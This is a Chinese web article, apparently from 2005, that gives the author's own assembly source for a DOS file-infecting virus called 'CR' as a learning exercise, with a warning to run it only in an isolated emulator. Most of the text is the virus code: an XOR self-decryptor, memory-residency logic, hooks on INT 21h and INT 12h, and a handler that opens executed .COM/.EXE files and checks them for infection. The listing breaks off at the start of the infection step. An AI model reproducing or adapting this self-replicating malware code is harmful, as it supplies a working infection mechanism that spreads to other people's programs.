自己用汇编语言写的一个病毒(源码)

http://www.rdxx.com 05年04月30日 00:00 我要投稿

关键词: 汇编语言 , 病毒 , 语言 , 汇编

这个病毒虽然比较简单。但是麻雀虽小,五脏俱全。隐藏,感染,加密等模块应有尽有(只是不会破坏),是一个比较标准的DOS病毒,可以感染.EXE(不包括PE)和.COM的可执行文件。
如果您希望学习汇编语言,用这个程序作为入门指导倒是比较合适的。但请注意:它是会自我复制的程序——驻留内存、挂接 INT 21h,并对经 INT 21h/4Bh 执行的 .COM/.EXE 文件进行感染——请只在隔离的 DOS 模拟器或一次性虚拟机中汇编和分析,不要在真实系统上运行。
染毒文件会被打上“CR”的标记,我们姑且称它为CR病毒吧。

; Offset of `begin` in the original (un-relocated) image: ORG 100h plus the
; 5-byte entry stub at `main` (mov ax,imm16 / jmp ax) and the 2-byte 'cr' tag.
; The memory-resident copy is laid down so that `begin` lands at offset 0 of
; its segment, which is why every resident-side reference below is written
; as `label-baseoff`.
baseoff equ 107h

code segment
assume cs:code,ds:code,es:code,ss:code
org 100h
; main: 5-byte entry stub at 100h - jump to `begin` through ax so the stub
; works unchanged wherever the body ends up.  The 'cr' at 105h is the
; infection marker: COM_infect tests word [di+5] for 7263h ('cr') and skips
; files that already carry it.
main:
mov ax,offset begin
jmp ax

db 'cr'
 
; ---------------------------------------------------------------------------
; begin: position-independent prologue + runtime decryptor.
;
; Assumes only that cs addresses the image this code lives in (a freshly
; loaded dropper, or a host whose entry stub jumped here).  The body from
; encodebegin to endtag is stored XOR-encoded and is decoded in place here
; before it runs.
;
; Register roles once the prologue is done:
;   bx = relocation delta = (address this code actually runs at)
;                         - (address it was assembled at, ORG 100h)
;        All later references to labels of the original image are written
;        `label[bx]` / `label+bx` for that reason.
;   dl = single-byte XOR key (first byte of oldhead, see below)
;   si = di = run-time address of encodebegin
; Stack on exit via retf: the host's es and ds pushed here stay on the stack;
; they are popped again on the hand-off path in alreadyresident/GotoExe.
; ---------------------------------------------------------------------------
begin:
push es                ; save the host's es/ds; restored right before control goes back to the host
push ds

mov ax,cs
mov ds,ax              ; ds = es = cs: all data below is addressed through the code segment
mov es,ax

call get_ip            ; get_ip returns its own return address in bx (see below)
push ax                ; ax is still cs here - this becomes the segment half of the retf target
mov ax,offset encodebegin
jmp short get_ip_end

; oldhead: the first 7 bytes of the host as they were before infection.
; Fresh-dropper value 00,4C,CD,21: the leading word 4C00h is what
; alreadyresident tests for to recognise "no host, just exit".  In an infected
; COM host these 7 bytes are copied back to 100h; in an infected EXE host the
; leading word is 6163h ('ca') and ini_ip/ini_cs/ini_ss/ini_sp hold the real
; entry point instead.  The first byte also serves as the decryptor's XOR key,
; so the key differs per host (the matching encryption done at infection time
; is outside this excerpt).
oldhead db 0h,4ch,0cdh,21h,6 dup (?)

; get_ip: "call/pop" trick without the pop - read the return address straight
; off the stack into bx and leave the stack balanced with ret.
get_ip label near
mov bp,sp
mov bx,[bp]
ret
get_ip_end:
sub bx,112h  ;get current offset: 112h is the assembled offset of the instruction after
             ;`call get_ip`, so bx is now the relocation delta.  NOTE(review): this magic
             ;number silently breaks if anything between `main` and the call changes size.
add ax,bx              ; ax = run-time address of encodebegin
push ax
pop di                 ; di = si = decode target (decoded in place)
mov si,di
cld
mov cx, offset endtag-offset encodebegin   ; length of the encoded region (endtag is past this excerpt)
mov dl, byte ptr [oldhead+bx]              ; key = first byte of the saved host head
                                           ; (00h in the fresh dropper, so the XOR is a no-op there)
push si                ; offset half of the retf target
decode:
lodsb
xor al,dl
stosb   ;decode at runtime: byte-wise XOR of [encodebegin,endtag) with the key in dl
loop decode
retf   ;retf  cs:ip=encodebegin - pops si (ip) then the cs pushed above; host es/ds remain pushed
db 62h                 ; 'be' - never executed; marker/padding after the decryptor
db 65h

; ---------------------------------------------------------------------------
; encodebegin: first instruction executed after decoding.  Installs the
; memory-resident copy and the INT 21h / INT 12h hooks unless a copy is
; already resident, then falls through into alreadyresident.
;
; In:  bx = relocation delta (from begin), ds = cs
; Resident image: 2048 bytes copied from `begin` to 9F80h:0000, so a label L
; of the original image lives at 9F80h:(L-baseoff).  9F80h is 80h paragraphs
; (= 2 KB) below A000h, i.e. the top 2 KB of a 640 KB conventional-memory
; machine.  NOTE(review): the segment is hard-coded; nothing here checks that
; the memory exists or is unused.
; ---------------------------------------------------------------------------
encodebegin:
mov ax,9f80h
mov es,ax
cmp es:word ptr [virustag-baseoff],7263h   ; 'cr' already at the resident location?
jz alreadyresident     ; yes: skip installation and go straight to the host hand-off

push ds
mov ax,40h
mov ds,ax              ; BIOS data area: 0040:0013 = conventional memory size in KB
mov di,13h ;get free memory
sub word ptr [di],2    ; claim the top 2 KB by lowering the BIOS count.
                       ; NOTE(review): only the BIOS word changes; nothing visible here
                       ; updates DOS's own memory arena, so the block is not truly reserved.
pop ds

mov di,0               ; es:di = 9F80h:0000
mov si,bx
add si,baseoff         ; ds:si = run-time address of `begin`
mov cx,2048
cld

rep movsb ;resident in memory: 2048 bytes starting at begin (already decoded) -> 9F80h:0

nop
push bx                ; bx (delta) is clobbered by INT 21h/35h below

mov ax,9f80h
mov ds,ax              ; ds = resident segment, for the stores below and for INT 21h/25h
mov ax,3521h
int 21h                ; get current INT 21h vector -> es:bx
mov ds:word ptr[oldint21-baseoff],bx
mov dx,bx              ; dead store: dx is overwritten before it is used
mov ds:word ptr[oldint21-baseoff+2h],es

mov dx,offset newint21proc-baseoff
mov ax,2521h
int 21h                ; INT 21h := 9F80h:newint21proc

mov dx,offset newint12proc-baseoff
mov ax,2512h
int 21h                ; INT 12h := 9F80h:newint12proc (handler body is past this excerpt)
pop bx

; ---------------------------------------------------------------------------
; alreadyresident: hand control back to the host program.
;
; In:  bx = relocation delta; the host's es and ds pushed by `begin` are
;      still the top two stack words.
; Three cases, decided from the saved head in oldhead:
;   word 6163h ('ca') -> infected EXE: rebuild ss:sp from ini_ss/ini_sp and
;                        far-jump to the original entry via ini_ip/ini_cs.
;   word 4C00h        -> fresh dropper (no host): terminate with INT 21h/4Ch.
;   anything else     -> infected COM: put the 7 original bytes back at 100h
;                        and jump there.
; ---------------------------------------------------------------------------
alreadyresident:
mov ax,cs
mov ds,ax
mov es,ax              ; ds = es = cs again (the install path left ds = 9F80h)
mov si,offset oldhead
add si,bx              ; ds:si = run-time oldhead
mov di,0100h           ; es:di = start of the COM image

cmp cs:word ptr oldhead[bx],6163h ;this is an infected EXE file ('ca' marker)
jz GotoExe

cld
mov cx,7
rep movsb              ; COM: restore the 7 original head bytes over the entry stub + 'cr'

pop ds
pop es                 ; host's ds/es back


cmp cs:word ptr oldhead[bx],4c00h   ; fresh-dropper head (00h,4Ch) -> there is no host to run
jz go_out
GotoOldHead:     ;this is an infected COM file
mov ax,0100h
jmp ax                 ; run the restored host from 100h
GotoExe:
pop ds
pop es                 ; host's ds/es back; ds is whatever DOS passed at entry (presumably the PSP)
mov ax,ds
add ax,cs:ini_ss[bx]   ;set old ss = ds + 10h (PSP -> load segment) + saved SS
add ax,10h
mov ss,ax
mov ax,cs:ini_sp[bx]   ;set old sp
mov sp,ax              ; NOTE(review): `mov ss` masks interrupts for ONE following instruction
                       ; only (the `mov ax` above), so an interrupt can land between it and
                       ; this `mov sp` with the new ss paired to the stale sp.  Load sp
                       ; immediately after ss (e.g. fetch ini_sp into a register first).
mov ax,ds
add ax,10h
add cs:ini_cs[bx],ax   ;set old cs: relocate the saved CS in place (writes into the code segment)
jmp cs:dword ptr ini_ip[bx]  ;jump to the normal EXE entry (far jump through ini_ip:ini_cs)
go_out:
mov ah,4ch
int 21h                ; terminate - reached only when run as the plain dropper

; --- resident-side data (addressed as label-baseoff from the 9F80h copy) ---
oldint21 dw 2 dup(?)   ; saved original INT 21h vector: offset, then segment (written at install)
filehead db 18h dup (?) ; first 18h bytes of the file a hooked EXEC (AH=4Bh) is about to run
filesize dw 2 dup(?)   ; size of that file; filled by getfilesize, which is past this excerpt
virustag db 'cr'       ; residency signature tested at encodebegin
; infecthead: byte-for-byte the same entry stub as `main` (mov ax,offset begin /
; jmp ax / 'cr'); presumably the bytes written over a host's head on infection -
; the code that writes it is past this excerpt.
infecthead:
mov ax,offset begin
jmp ax
db 'cr'
temp dw ?              ; scratch word; no use visible in this excerpt

; Saved EXE-header entry point and initial stack of the host, consumed by GotoExe.
ini_ip dw ?
ini_cs dw ?
ini_ss dw ?
ini_sp dw ?

newint21proc:
cmp ah,4bh
jz tryinfect
jmp int21h
tryinfect:
push ax   ;begin to infect
push cx
push es
push di
push bx
push dx
push ds

mov ax,3d02h
int 21h
jnc openok
jmp notinfect  ;open fail? not infect
openok:
push ds
push dx
push cs
pop ds
mov dx,offset filehead-baseoff
mov bx,ax
mov cx,18h
mov ah,3fh
int 21h
pop dx
pop ds
jc closefilenear  ;read fail? not infect

mov di,offset filehead-baseoff
mov ax,9f80h
mov es,ax

cmp word ptr es:[di],5a4dh ;'MZ' in head? EXE file...
jnz COM_infect
jmp EXE_infect

COM_infect:
cmp word ptr es:[di+5],7263h ;'cr' in 105h? not infect
jz closefilenear  

call getfilesize
cmp dx,0
jnz closefilenear   ; file is too big..not infect
cmp ax,63000
ja  closefilenear   ; file is too big..not infect
cmp ax,10
jb  closefilenear   ; file is too small..not infect

;infect begin,hahahahaha....
